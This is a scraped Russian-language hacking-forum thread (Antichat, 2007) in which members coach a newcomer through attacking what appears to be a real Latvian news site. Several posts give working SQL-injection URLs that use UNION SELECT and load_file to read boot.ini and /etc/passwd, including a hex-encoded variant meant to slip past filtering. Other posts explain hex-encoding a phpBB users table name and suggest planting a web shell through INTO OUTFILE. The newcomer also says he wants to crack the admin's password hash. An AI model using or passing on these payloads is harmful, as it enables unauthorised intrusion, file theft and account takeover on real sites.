HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.12.2007, 12:04
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
попробуй так
 
Ответить с цитированием

  #12  
Старый 28.12.2007, 00:02
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами: 9671107

Репутация: 8
По умолчанию

delay(0) Thanks . )
Токо вот как ты получил 0x70687062625f7573657273 ?
 
Ответить с цитированием

  #13  
Старый 28.12.2007, 15:11
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами: 10246130

Репутация: 141
По умолчанию

Цитата:
Токо вот как ты получил 0x70687062625f7573657273 ?
Перевел название таблицы в hex.
 
Ответить с цитированием

  #14  
Старый 28.12.2007, 16:28
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию

Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. Как? А вот так:
https://forum.antichat.ru/showpost.php?p=198446&postcount=3
 
Ответить с цитированием

  #15  
Старый 28.12.2007, 19:40
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами: 9671107

Репутация: 8
По умолчанию

Цитата:
Сообщение от iddqd  
Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. [/U]
А можно немного поподробней об file_priv ...???

А то немогу расхешировать пароль Админа на phpBB....
 
Ответить с цитированием

  #16  
Старый 28.12.2007, 20:15
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами: 10261766

Репутация: 1079


По умолчанию

короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
либо
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

То file_priv есть, иначе его нет
 
Ответить с цитированием

  #17  
Старый 28.12.2007, 20:21
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от Macro  
короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/*
либо
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

То file_priv есть, иначе его нет
тогда уж http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file(0x433A2F626F6F742E6 96E69),4,5,6/*

так надежней, к тому же как я понял серв виндовый:
Цитата:
Получил версию : 5.0.21-community-nt
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ExBB 1.9.1 - залить шелл TweakeR Уязвимости CMS / форумов 9 09.02.2006 12:29
Помогите залить шел Tikson Уязвимости 5 10.01.2006 22:31
Помогите найти хороший шелл Юличка Болталка 10 16.12.2005 19:39
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.